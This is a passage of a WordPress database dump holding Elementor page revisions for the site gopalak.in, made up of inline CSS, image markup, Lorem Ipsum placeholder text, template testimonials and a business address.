.elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 10:16:00','2022-10-03 04:46:00','',1373,'https://gopalak.in/?p=1513',0,'revision','',0),(1514,1,'2022-10-03 10:16:01','2022-10-03 04:46:01','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, 